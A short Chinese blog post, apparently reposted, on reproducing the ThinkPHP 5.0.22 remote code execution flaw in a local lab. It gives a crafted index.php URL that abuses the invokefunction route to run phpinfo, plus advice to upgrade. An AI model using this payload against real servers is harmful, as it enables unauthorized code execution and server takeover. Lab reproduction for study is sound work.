码迷,mamicode.com
首页 > Web开发 > 详细

thinkphp远程执行漏洞的本地复现

时间:2020-02-15 15:55:18      阅读:117      评论:0      收藏:0      [点我收藏+]

标签:控制器   强制   修复   情况   alt   简介   code   php5   href   

thinkphp远程执行漏洞的本地复现

0X00漏洞简介

由于ThinkPHP5 框架控制器名 没有进行足够的安全监测,导致在没有开启强制路由的情况下,可以伪装特定的请求可以直接Getshell(可以控制服务器)

0X01环境搭建

下载存在漏洞版本我下载的版本是thinkphp_5.0.22搭建好以后如图技术图片

 

0X02漏洞复现

构造几个特殊的url即可复现漏洞。

http://127.0.0.1/thinkphp_5.0.22/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

可得到phpinfo界面

技术图片

0X03漏洞修复

建议升级到最新版本

thinkphp远程执行漏洞的本地复现

标签:控制器   强制   修复   情况   alt   简介   code   php5   href   

原文地址:https://www.cnblogs.com/L0ading/p/12312120.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!